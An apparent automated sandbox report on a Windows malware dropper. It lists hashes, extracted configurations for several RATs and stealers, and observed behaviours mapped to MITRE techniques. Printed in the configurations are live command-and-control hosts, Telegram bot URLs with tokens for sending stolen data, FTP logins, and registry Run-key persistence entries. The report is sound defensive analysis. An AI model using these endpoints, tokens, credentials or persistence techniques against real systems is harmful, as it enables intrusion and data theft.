asyncrat | 6b81b36622febc198dbe4596349b7b781cd6b278e9db9145a2de8b14b045e128

Resubmissions

09-02-2025 17:26

250209-vzvbzaxpck 10

09-02-2025 17:22

09-02-2025 16:34

09-02-2025 16:32

27-01-2025 22:33

27-01-2025 22:28

27-01-2025 22:21

Analysis

max time kernel
76s
max time network
413s
platform
windows11-21h2_x64
resource
win11-20250207-en
resource tags

arch:x64arch:x86image:win11-20250207-enlocale:en-usos:windows11-21h2-x64system
submitted
09-02-2025 16:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document.exe
Size

4KB
MD5

a239a27c2169af388d4f5be6b52f272c
SHA1

0feb9a0cd8c25f01d071e9b2cfc2ae7bd430318c
SHA256

98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc
SHA512

f30e1ff506cc4d729f7e24aa46e832938a5e21497f1f82f1b300d47f45dae7f1caef032237ef1f5ae9001195c43c0103e3ab787f9196c8397846c1dea8f351da
SSDEEP

48:6r1huik0xzYGJZZJOQOulbfSqXSfbNtm:IIxcLpf6zNt

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
77.87.194.3
Port:
21
Username:
user
Password:
tudelft

Extracted

Credentials

Protocol: ftp
Host:
37.113.31.7
Port:
21
Username:
ftp
Password:
BMWM5

Extracted

Credentials

Protocol: ftp
Host:
164.46.126.19
Port:
21
Username:
admin
Password:
TEST

Extracted

Family

phemedrone

https://api.telegram.org/bot7602843389:AAE9dcCKuyUGx9HUNQf9KbsZDhME6HwC10g/sendMessage?chat_id=1745421249

Extracted

Family

xworm

127.0.0.1:2727

dnsdeerrorlehaxor.ddns.net:2727

Attributes

Install_directory
%Public%
install_file
Discord.exe
telegram
https://api.telegram.org/bot5964175002:AAFK1mpStrMUWwegniLJuryZjOhVavZhSGo/sendMessage?chat_id=1745421249

Extracted

Family

njrat

Botnet

HacKed

Mutex

53$79$73$74$65$6d$33$32

Attributes

reg_key
53$79$73$74$65$6d$33$32
splitter
|-F-|

Extracted

Family

azorult

http://anastaf4.beget.tech

Extracted

Family

xworm

Version

5.0

157.20.182.169:1515

me-work.com:7008

Mutex

qqWjm3mbt3teI8Oz

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

vidar

https://t.me/sok33tn

https://steamcommunity.com/profiles/76561199824159981

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0

Extracted

Family

quasar

Version

1.4.1

Botnet

githubyt

87.228.57.81:4782

Mutex

cf3988ab-2fd9-4544-a16f-9faa71eb5bac

Attributes

encryption_key
19A0FAF8459F69650B5965C225752D425C429EEC
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
svchoost.exe
subdirectory
SubDir

Extracted

Family

asyncrat

Version

AsyncRAT

Botnet

test

otrodia8912.gleeze.com:3333

Mutex

123

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

njrat

Version

Njrat 0.7 Golden By Hassan Amiri

Botnet

HacKed

82.193.104.21:5137

Mutex

Windows Update

Attributes

reg_key
Windows Update
splitter
|Hassan|

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

18.ip.gl.ply.gg:6606

18.ip.gl.ply.gg:7707

18.ip.gl.ply.gg:8808

18.ip.gl.ply.gg:9028

0.tcp.in.ngrok.io:18220

Mutex

HyFTucy74RnH

Attributes

delay
3
install
true
install_file
Discord.exe
install_folder
%AppData%

aes.plain

Extracted

Family

redline

Botnet

Wipe

91.219.236.248:1912

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Azorult family
azorult

Detect Vidar Stealer 9 IoCs

stealer

resource	yara_rule
behavioral1/memory/5692-2228-0x0000000000400000-0x000000000085E000-memory.dmp	family_vidar_v7
behavioral1/files/0x001800000002b312-4962.dat	family_vidar_v7
behavioral1/memory/4732-4970-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/5364-5060-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/5692-5206-0x0000000000400000-0x000000000085E000-memory.dmp	family_vidar_v7
behavioral1/memory/4732-5746-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/5364-5761-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/5364-6170-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/4732-6186-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7

Detect Xworm Payload 5 IoCs

resource	yara_rule
behavioral1/files/0x001700000002b2e2-2284.dat	family_xworm
behavioral1/memory/1856-2304-0x0000000000340000-0x000000000039C000-memory.dmp	family_xworm
behavioral1/files/0x001700000002b365-3048.dat	family_xworm
behavioral1/memory/7220-3719-0x0000000000FB0000-0x0000000000FC0000-memory.dmp	family_xworm
behavioral1/memory/6940-6204-0x0000000000FA0000-0x0000000000FB0000-memory.dmp	family_xworm

NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore
Nanocore family
nanocore
Njrat family
njrat
Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
Phemedrone family
phemedrone
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/files/0x001700000002b387-5036.dat	family_quasar
behavioral1/memory/7272-5044-0x0000000000B30000-0x0000000000E54000-memory.dmp	family_quasar

Ramnit
Ramnit is a versatile family that holds viruses, worms, and Trojans.
trojan spyware stealer worm banker ramnit
Ramnit family
ramnit
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral1/files/0x001f00000002b33a-5299.dat	family_redline
behavioral1/memory/6292-5304-0x0000000000720000-0x0000000000772000-memory.dmp	family_redline

Redline family
redline
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Async RAT payload 3 IoCs

rat

resource	yara_rule
behavioral1/files/0x001c00000002b341-5072.dat	family_asyncrat
behavioral1/files/0x001800000002b380-5153.dat	family_asyncrat
behavioral1/files/0x001700000002b391-5182.dat	family_asyncrat

Contacts a large (2315) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Bjkm5hE.exe

Blocklisted process makes network request 9 IoCs

flow	pid	Process
267	1496	chrome.exe
268	1496	chrome.exe
269	1496	chrome.exe
270	1496	chrome.exe
271	1496	chrome.exe
279	1496	chrome.exe
280	1496	chrome.exe
283	1496	chrome.exe
284	1496	chrome.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
6248	powershell.exe
5736	powershell.exe
2488	powershell.exe
5372	powershell.exe
6120	powershell.exe
1868	powershell.exe

Disables Task Manager via registry modification
defense_evasion

Downloads MZ/PE file 24 IoCs

flow	pid	Process
13	3524	New Text Document.exe
15	3524	New Text Document.exe
251	7496	svc.exe
251	7496	svc.exe
109	3524	New Text Document.exe
109	3524	New Text Document.exe
109	3524	New Text Document.exe
109	3524	New Text Document.exe
109	3524	New Text Document.exe
168	3524	New Text Document.exe
46	3524	New Text Document.exe
135	6060	laserrr.exe
35	3524	New Text Document.exe
4	3524	New Text Document.exe
23	3524	New Text Document.exe
27	3524	New Text Document.exe
17	3524	New Text Document.exe
90	3524	New Text Document.exe
106	3524	New Text Document.exe
108	3320	Explorer.EXE
194	3524	New Text Document.exe
229	3524	New Text Document.exe
212	3524	New Text Document.exe
50	3524	New Text Document.exe

Indicator Removal: Network Share Connection Removal 1 TTPs 4 IoCs

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

defense_evasion

Network Share Connection Removal

T1070.005

pid	Process
980	cmd.exe
7420	net.exe
5208	net.exe
5596	net.exe

Modifies Windows Firewall 2 TTPs 6 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
8168	netsh.exe
5280	netsh.exe
3172	netsh.exe
4212	netsh.exe
5688	netsh.exe
5128	netsh.exe

Uses browser remote debugging 2 TTPs 34 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
2132	msedge.exe
7336	chrome.exe
7208	msedge.exe
7488	chrome.exe
8088	chrome.exe
6500	msedge.exe
6132	msedge.exe
1236	msedge.exe
2912	chrome.exe
7516	msedge.exe
5768	msedge.exe
2100	msedge.exe
6012	msedge.exe
5932	chrome.exe
7284	chrome.exe
4008	chrome.exe
2088	msedge.exe
5344	chrome.exe
5272	chrome.exe
3368	msedge.exe
8176	msedge.exe
6472	msedge.exe
6636	msedge.exe
6264	msedge.exe
7696	msedge.exe
4284	chrome.exe
8088	msedge.exe
6864	chrome.exe
6396	chrome.exe
800	msedge.exe
7296	chrome.exe
8004	chrome.exe
4408	chrome.exe
6172	msedge.exe

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral1/files/0x001900000002b35e-4798.dat	net_reactor
behavioral1/memory/6284-4803-0x0000000000DB0000-0x0000000000DD0000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Bjkm5hE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Bjkm5hE.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
5188	cmd.exe
5604	powershell.exe

Drops startup file 5 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe	Update.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System32.exe	Update.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk	IMG001.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Security Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Security Update.exe	server.exe

Executes dropped EXE 59 IoCs

pid	Process
2744	lem.exe
3772	StCl.exe
2260	untitled2.exe
5844	random.exe
5692	Bjkm5hE.exe
3956	silk.exe
5592	silk.tmp
3720	olddataeraser19.exe
5140	IMG001.exe
5824	tftp.exe
3180	z.exe
4884	steam.exe
4280	Steam.exe
1856	Discord.exe
1528	IMG001.exe
6076	bitcoin3000.exe
5164	savedecrypter.exe
5584	Update.exe
2404	cpuminer-avx.exe
4764	tftp.exe
5308	cann.exe
4976	WindowsServices.exe
5228	bin2.exe
5288	bin2Srv.exe
1056	Update.exe
3576	cHSzTDjVl.exe
5536	ServerX.exe
5348	LinkedinTuVanDat.exe
5292	sas.exe
1908	server.exe
2308	giania.exe
4128	WindowsServices.exe
4696	code.exe
2608	E1EF.tmp.exe
6060	laserrr.exe
6040	E1EF.tmp.exe
3704	pure.exe
7220	GRAW.exe
5196	RegAAsm.exe
7496	svc.exe
6484	laser.exe
6284	client2.exe
5664	client2.exe
4972	client2.exe
7528	client2.exe
7892	client.exe
5284	client.exe
6328	client.exe
7740	svc1.exe
6648	svc1.exe
6388	svc1.exe
5188	svc1.exe
6652	fusca%20game.exe
6692	svchost.exe
1500	temp_12152.exe
7440	temp_12152.exe
4732	jrirkfiweid.exe
5488	temp_12165.exe
7344	temp_12168.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2420732851-834218046-3184189440-1000\Software\Wine	random.exe
Key opened	\REGISTRY\USER\S-1-5-21-2420732851-834218046-3184189440-1000\Software\Wine	Bjkm5hE.exe

Loads dropped DLL 15 IoCs

pid	Process
5592	silk.tmp
3720	olddataeraser19.exe
2404	cpuminer-avx.exe
2404	cpuminer-avx.exe
2404	cpuminer-avx.exe
6040	E1EF.tmp.exe
6040	E1EF.tmp.exe
6040	E1EF.tmp.exe
6040	E1EF.tmp.exe
6040	E1EF.tmp.exe
7440	temp_12152.exe
7440	temp_12152.exe
7440	temp_12152.exe
7440	temp_12152.exe
7440	temp_12152.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 20 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System32 = "C:\\Users\\Admin\\AppData\\Roaming\\Update.exe"	Update.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2420732851-834218046-3184189440-1000\Software\Microsoft\Windows\CurrentVersion\Run\SystemHandler = "C:\\Users\\Admin\\AppData\\Local\\Temp\\temp_12165.exe"	temp_12165.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2420732851-834218046-3184189440-1000\Software\Microsoft\Windows\CurrentVersion\Run\cebdfac = "\"C:\\ProgramData\\cebdfac.exe\""	z.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\TCP Monitor = "C:\\Program Files (x86)\\TCP Monitor\\tcpmon.exe"	savedecrypter.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System32 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Update.exe\" .."	Update.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\220fe34d4dcc4a99fe35d2fb7ce78939 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\fusca%20game.exe\" .."	fusca%20game.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\53$79$73$74$65$6d$33$32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\explorer\\WmiPrvSE.exe"	Update.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2420732851-834218046-3184189440-1000\Software\Microsoft\Windows\CurrentVersion\Run\System32 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Update.exe\" .."	Update.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\53$79$73$74$65$6d$33$32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\explorer\\WmiPrvSE.exe"	WindowsServices.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\System32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\explorer\\WmiPrvSE.exe"	Update.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2420732851-834218046-3184189440-1000\Software\Microsoft\Windows\CurrentVersion\Run\SystemHandler = "C:\\ProgramData\\Winsrv\\winsvc.exe"	temp_12165.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2420732851-834218046-3184189440-1000\Software\Microsoft\Windows\CurrentVersion\Run\220fe34d4dcc4a99fe35d2fb7ce78939 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\fusca%20game.exe\" .."	fusca%20game.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	bitcoin3000.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2420732851-834218046-3184189440-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe"	IMG001.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2420732851-834218046-3184189440-1000\Software\Microsoft\Windows\CurrentVersion\Run\cebdfac = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\z.exe\""	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2420732851-834218046-3184189440-1000\Software\Microsoft\Windows\CurrentVersion\Run\System32 = "C:\\Users\\Admin\\AppData\\Roaming\\Update.exe"	Update.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\53$79$73$74$65$6d$33$32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\explorer\\WmiPrvSE.exe"	Update.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\53$79$73$74$65$6d$33$32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\explorer\\WmiPrvSE.exe"	WindowsServices.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2420732851-834218046-3184189440-1000\Software\Microsoft\Windows\CurrentVersion\Run\cebdfac = "\"C:\\ProgramData\\cebdfac.exe\""	Explorer.EXE

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

defense_evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	savedecrypter.exe

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Legitimate hosting services abused for malware hosting/C2 1 TTPs 11 IoCs

Web Service

T1102

flow	ioc
4269	0.tcp.in.ngrok.io
4355	discord.com
52	raw.githubusercontent.com
640	0.tcp.in.ngrok.io
2424	0.tcp.in.ngrok.io
3341	0.tcp.in.ngrok.io
3378	raw.githubusercontent.com
3711	0.tcp.in.ngrok.io
56	raw.githubusercontent.com
1629	0.tcp.in.ngrok.io
4356	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4353	ip-api.com
57	ip-api.com

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
6924	cmd.exe
4152	ARP.EXE

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Power Settings 1 TTPs 4 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
4636	cmd.exe
5672	powercfg.exe
5500	powercfg.exe
5496	powercfg.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x002000000002b2f3-2459.dat	autoit_exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\Notepadx.exe.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Notepadx.exe.exe	server.exe

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
5296	tasklist.exe
8160	tasklist.exe
3552	tasklist.exe
8064	tasklist.exe
7308	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
5844	random.exe
5692	Bjkm5hE.exe

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 2744 set thread context of 6012	2744	lem.exe	142
PID 5308 set thread context of 5368	5308	cann.exe	162
PID 6284 set thread context of 4972	6284	client2.exe	211
PID 6284 set thread context of 7528	6284	client2.exe	212
PID 7892 set thread context of 5284	7892	client.exe	216
PID 7892 set thread context of 6328	7892	client.exe	217
PID 7740 set thread context of 6388	7740	svc1.exe	224
PID 7740 set thread context of 5188	7740	svc1.exe	541

UPX packed file 15 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/5288-2509-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral1/memory/440-6416-0x00007FFFBB930000-0x00007FFFBBF95000-memory.dmp	upx
behavioral1/memory/440-6418-0x00007FFFE0E90000-0x00007FFFE0E9F000-memory.dmp	upx
behavioral1/memory/440-6417-0x00007FFFD6F70000-0x00007FFFD6F97000-memory.dmp	upx
behavioral1/memory/440-6423-0x00007FFFD6F40000-0x00007FFFD6F6B000-memory.dmp	upx
behavioral1/memory/440-6426-0x00007FFFC05B0000-0x00007FFFC072F000-memory.dmp	upx
behavioral1/memory/440-6425-0x00007FFFD6F10000-0x00007FFFD6F35000-memory.dmp	upx
behavioral1/memory/440-6424-0x00007FFFD7320000-0x00007FFFD7339000-memory.dmp	upx
behavioral1/memory/440-6434-0x00007FFFDF780000-0x00007FFFDF78D000-memory.dmp	upx
behavioral1/memory/440-6433-0x00007FFFC5B80000-0x00007FFFC5C4E000-memory.dmp	upx
behavioral1/memory/440-6432-0x00007FFFBB3F0000-0x00007FFFBB923000-memory.dmp	upx
behavioral1/memory/440-6431-0x00007FFFD6EB0000-0x00007FFFD6EE3000-memory.dmp	upx
behavioral1/memory/440-6430-0x00007FFFD6EF0000-0x00007FFFD6F09000-memory.dmp	upx
behavioral1/memory/440-6436-0x00007FFFDB360000-0x00007FFFDB36D000-memory.dmp	upx
behavioral1/memory/440-6435-0x00007FFFD6E90000-0x00007FFFD6EA4000-memory.dmp	upx

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\TCP Monitor\tcpmon.exe	savedecrypter.exe
File opened for modification	C:\Program Files (x86)\TCP Monitor\tcpmon.exe	savedecrypter.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File created	C:\Windows\Tasks\UAC.job	schtasks.exe
File created	C:\Windows\WindowsServices.exe	WindowsServices.exe
File opened for modification	C:\Windows\WindowsServices.exe	WindowsServices.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x001700000002b32b-2599.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 8 IoCs

pid	pid_target	Process	procid_target
5348	5288	WerFault.exe	172
6808	6284	WerFault.exe	209
6604	7892	WerFault.exe	214
7940	7740	WerFault.exe	219
2060	7480	WerFault.exe	280
7484	6220	WerFault.exe	306
6320	1608	WerFault.exe	556
8284	5304	WerFault.exe	574

System Location Discovery: System Language Discovery 1 TTPs 58 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	savedecrypter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ServerX.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	code.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IMG001.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	laser.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tftp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	client2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tftp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cann.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WindowsServices.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IMG001.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	silk.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bin2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	temp_12165.exe
